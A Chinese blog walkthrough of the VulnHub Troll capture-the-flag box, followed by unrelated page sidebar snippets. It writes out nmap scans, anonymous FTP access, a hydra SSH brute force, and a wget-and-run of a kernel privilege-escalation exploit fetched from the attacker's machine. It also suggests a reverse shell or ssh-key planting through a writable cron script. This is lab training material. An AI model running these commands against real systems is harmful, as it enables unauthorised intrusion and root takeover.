【Troll靶场渗透】

最新推荐文章于 2024-08-16 18:41:12 发布
最新推荐文章于 2024-08-16 18:41:12 发布
阅读量148 收藏 3
点赞数 3
分类专栏: 靶场渗透 文章标签: 网络安全 web安全 靶场 渗透 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/141220765
版权

一、主机发现

nmap -sP 192.168.78.0/24
arp-scan 192.168.78.0/24

靶机IP:192.168.78.179

Kali IP :192.168.78.128

二、端口及服务探测

nmap -sV -p- -A 192.168.78.179

发现开放了21 22 80等端口

21端口ftp存在lol.pcap流量文件,以及FTP带有匿名登录名:Anonymous FTP login allowed

80端口 http存在robots.txt和secret目录文件

三、FTP登录

登录ftp获取到流量文件

账号密码:Anonymous/Anonymous

利用wireshark进行分析,数据包不多直接追踪tcp流

显示了一个文件secret_stuff.txt,继续查看流2

获取到可疑字符串sup3rs3cr3tdirlol

ftp服务探测到这里基本结束

四、HTTP信息获取

访问80端口页面

只有一张图片,根据上面通过ftp获取到的信息,我们访问一下secret_stuff.txt和sup3rs3cr3tdirlol

访问secret_stuff.txt显示

访问sup3rs3cr3tdirlol

发现存在一个文件,我们下载下来分析

通过binwalk,file,strings,editor等工具查找是否有价值的信息,最终找到

Find address 0x0856BF to proceed这样的提示

访问一下

发现存放着一些目录和文件,通过访问大致能判断分别存放的是账户名和密码

但是密码没有明显写出,后面发现文件名就是密码

那么通过hydra工具进行爆破

which_one_lol.txt文件内容:
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
Pass.txt文件内容:
Good_job_:)

五、SSH破解

hydra -L user.txt -p Pass.txt 192.168.78.179 ssh

ssh登录
ssh overflow@192.168.78.179
python -c 'import pty;pty.spawn("/bin/bash")'

六、提权

查看系统版本

uname -a

searchsploit Linux ubuntu 3.13.0

locate linux/local/37292.c
cat /usr/share/exploitdb/exploits/linux/local/37292.c

然后一样的将文件cp到当前目录,开启http服务,再到靶机下载运行

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/
python3 -m http.server 8000
python -c 'import pty;pty.spawn("/bin/bash")'
cd /tmp
wget http://192.168.78.128:8000/37292.c
gcc 37292.c -o hp
./hp
python -c 'import pty;pty.spawn("/bin/bash")'

完成!

七、拓展思路

在打靶时肯定会发现ssh一会儿就会断开,这里是因为有定时任务在清理ssh进程,每5分钟就被踢一次!

find / -name cronlog 2>/dev/null    ---查看计划任务日志信息
find / -name cleaner.py 2>/dev/null   ---查看文件在哪儿

find / -writable 2>/dev/null   ---枚举所有可写入权限的文件
find / -perm -o+w -type f 2> /dev/null | grep /proc -v   ---枚举找到/lib/log/cleaner.py

知道了计划任务和py脚本可写入,以及py的位置后,方法有很多种:

1)反弹shell

2)创建root可执行程序,获得root权限

3)写入ssh-rsa,ssh登录root用户

具体操作可自行搜索相关文章。

一纸-荒芜
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透靶场——HackMyVM:Family
tlovejr的博客
03-21 1042
部署环境: 提供镜像文件后,直接用虚拟机打开即可,在这里和以往有些不同,我采取了两个虚拟机软件的形式,一个是VMware,另个就是就是vbox,连接的方式都是桥接即可 Kali机ip地址:192.168.1.5 靶机ip地址:192.168.1.6 1、扫描存活主机ip地址 arp-scan -l 2、扫描一下存活端口 nmap -v -A -p- 192.168.1.6 发现只有22端口还有80这个web端口开放,直接对80端口进行访问 3、对web80端口开始进行渗透 首页里面有一个wordp
bottleneck靶机_Bottleneck靶机渗透
weixin_39953481的博客
12-21 265
Bottleneck端口扫描,主机发现。敏感目录为:http://192.168.114.165/image_gallery.php在该目录下发现:http://192.168.114.165/image_gallery.php?t=1596116082&f=Ym90dGxlbmVja19kb250YmUucG5n这个看起来是有一个base64加密的,解密后为bottleneck_dont...
[VulnHub靶机渗透] Tr0ll
人若无名,便可专心练剑
05-19 715
靶机精讲之Tr0ll ,vulnhub靶机,没有大招,但都是不可或缺的小技巧。用到FTP的使用技巧、File命令、binwalk命令、strings命令、Wireshark包文件、黑丝(黑客思路)、Leetspeak、Crackmapexec、hydra、Find命令技巧、系统命令。
VulnHub渗透测试实战靶场 - Breach 1.0
LYJ20010728的博客
08-04 1125
Vulnhub - Breach-1.0环境下载Breach-1.0靶机搭建渗透过程信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Breach-1.0靶机搭建 将下载好的靶机环境,用VMware导入即可使用 VMware虚拟机配置有静态IP地址:192.168.110.140,需要将虚拟机网卡设置为host-only方式 攻击机IP:192.168.110.128 靶机IP:192.168.110.140 渗透过程 信息搜集 使用arp-scan来检测我们的目
红队打靶:Troll1打靶思路详解(vulnhub
Bossfrank的博客
07-06 743
本文是vulnhub靶机Troll的详细打靶过程。涉及到的知识点包括FTP匿名登录、strings命令、密码喷射crackmapexec、定时任务提权等。靶机本身不复杂,但关键是有一些命令的操作。包括strings查看文件的文本信息、binwalk查看捆绑文件、file命令查看文件信息。如果不使用这些命令,可能会遗漏很多重要信息。
vulnhub靶场--Tr0ll2靶场
zzzzzzkeai的博客
11-27 834
vulnhub靶场--Tr0ll2靶场
vulnhub靶机Tr0ll:1渗透笔记
weixin_52268949的博客
03-12 5227
Tr0ll:1渗透笔记 靶场下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/ kali ip:192.168.20.128 靶机和kali位于同一网段 信息收集 首先通过nmap扫描靶机ip地址 nmap -sP 192.168.20.0/24 确定靶机ip 扫描开放端口 nmap -sV 192.168.20.129 发现21 和80 端口可能有用我们先来看看80端口 并没有发现什么信息我们使用dirb扫描一下目录 dirb http://192.1
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 1595
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
Vulnhub-Troll-1
Koi_111的博客
08-15 678
它不仅会扫描从 1 到 65535 端口,还会尝试识别操作系统、服务版本以及进行一些默认的脚本扫描,并执行路由跟踪。exploit database是一个在线资源库,里面收录了大量已知的计算机系统漏洞和相应的漏洞利用代码(exploit)。端口就像计算机上的大门,通过这些大门,你可以访问计算机上的不同服务。是一个目录爆破工具,它用于通过逐个尝试常见的目录和文件名,发现目标网站上隐藏或未列出的资源。网站进行扫描,尝试找到网站上可能存在的目录或文件。尝试访问/robots.txt 目录下的文件。
GUI.rar_Troll_qt commercial
09-19
Qt,源自挪威Troll Tech公司的创新之作,是一个强大的跨平台C++图形用户界面(GUI)工具包。它以其卓越的性能、丰富的功能和易用性在开发者社区中广受赞誉。Qt支持多种操作系统,如Windows、Linux、macOS、Android...
Troll Bait
10-28
Troll Bait
troll-开源
05-01
troll(例如patchDownload)是一种自动代理,可以出于安全考虑对系统进行修补。 获取可用补丁列表与已安装的比较检查完整性安装那些可以并且不要破坏依赖关系的文件
troll-football
05-26
从https://github.com/rtorino/troll-football.git克隆此仓库 从根目录运行npm install 运行gulp dev (可能需要全局安装Gulp npm install gulp -g ) 您的浏览器将自动打开并定向到浏览器同步代理地址
troll-destroyer
03-29
troll-destroyer
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8390
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
特洛伊木马:现代网络安全的隐形威胁
最新发布
weixin_48579910的博客
08-16 299
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
Animetronic - hackmyvm
tanbinn的博客
08-12 469
hackmyvm的Animetronic靶场
IDS 与 IPS:网络安全的两道防线
hakksjss的博客
08-16 141
然而,IDS 也存在一定的局限性。它就像是网络世界中的“哨兵”,时刻保持警惕,依据一定的安全策略,分析网络数据包、系统日志等信息,试图发现各种潜在的攻击企图、入侵行为以及异常活动。此外,IPS 的误报率也是一个需要关注的问题,如果错误地拦截了正常的流量,可能会影响业务的正常运行。如果确定为攻击行为,IPS 则根据预先设置的规则和策略,立即阻断相关的流量,防止攻击对网络造成更大的破坏。它串联在网络中,实时分析流经的网络流量,一旦发现与已知攻击模式或异常行为相符的流量,立即采取行动,防止攻击的进一步扩散。
C++编程 一个游戏中有多种怪物(Monster)。怪物之间可能要发生战斗(fight),每场战斗都是一个怪物与另一怪物之间的一对一战斗。每个怪物都有自己的生命值(hitpoint)、攻击力值(damage)和防御力值(defense),每种怪物都有各自特有的攻击(attack)方式,产生相应的攻击效果:战斗时,两个怪物依次攻击对方,即怪物a 首先攻击怪物b,然后轮到怪物b攻击怪物a,之后,怪物a 再次攻击怪物b,⋯⋯,直到一方生命值为0。   请根据你对上述描述的理解,定义并实现怪物类Monster,成员的设计可以任意,但要求该类至少有一个不带virtual修饰的成员函数fight,用来描述与另外一个怪物进行战斗的过程,该函数的实现可为Monster类的任意派生类所复用(派生类不需重新定义及实现)。不必考虑怪物的生命值减少至0后如何处理。
06-12
好的,根据你的要求,我来为你实现怪物类Monster。 首先,我们可以定义一个Monster类,包含hitpoint、damage、defense和attack等成员变量和函数。其中,attack函数可以用虚函数来定义,以便在派生类中实现不同的攻击方式。 ```c++ class Monster { public: Monster(int hp, int dmg, int def) : hitpoint(hp), damage(dmg), defense(def) {} virtual void attack(Monster& enemy) {} void fight(Monster& enemy) { while (hitpoint > 0 && enemy.hitpoint > 0) { attack(enemy); if (enemy.hitpoint <= 0) break; enemy.attack(*this); } } private: int hitpoint; int damage; int defense; }; ``` 在这里,我们定义了一个Monster类,它有三个私有成员变量:hitpoint、damage和defense,表示怪物的生命值、攻击力和防御力。另外,我们定义了一个不带virtual修饰的成员函数fight,用来描述与另一个怪物进行战斗的过程。在fight函数中,我们通过调用attack函数来模拟战斗,直到其中一个怪物的生命值降为0。 接下来,我们可以派生出一些具体的怪物类,并实现它们的攻击方式,例如: ```c++ class Goblin : public Monster { public: Goblin() : Monster(50, 10, 5) {} void attack(Monster& enemy) { int damage = this->damage - enemy.defense; if (damage > 0) { enemy.hitpoint -= damage; } } }; class Troll : public Monster { public: Troll() : Monster(100, 20, 10) {} void attack(Monster& enemy) { int damage = this->damage - enemy.defense; if (damage > 0) { enemy.hitpoint -= damage; this->hitpoint += damage / 2; // Troll can heal itself } } }; ``` 在这里,我们派生出了Goblin和Troll两个具体的怪物类,并实现了它们各自的攻击方式。Goblin的攻击方式是直接减去敌人的防御力,并造成相应的伤害;而Troll的攻击方式除了减去敌人的防御力外,还会使自己恢复一部分生命值。 最后,我们可以使用这些怪物类来进行战斗,例如: ```c++ int main() { Goblin goblin; Troll troll; goblin.fight(troll); return 0; } ``` 在这个例子中,我们创建了一个Goblin对象和一个Troll对象,并让它们进行战斗。由于我们在Monster类中定义了通用的战斗方式,因此我们可以直接调用fight函数进行战斗,而不用考虑具体的攻击方式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值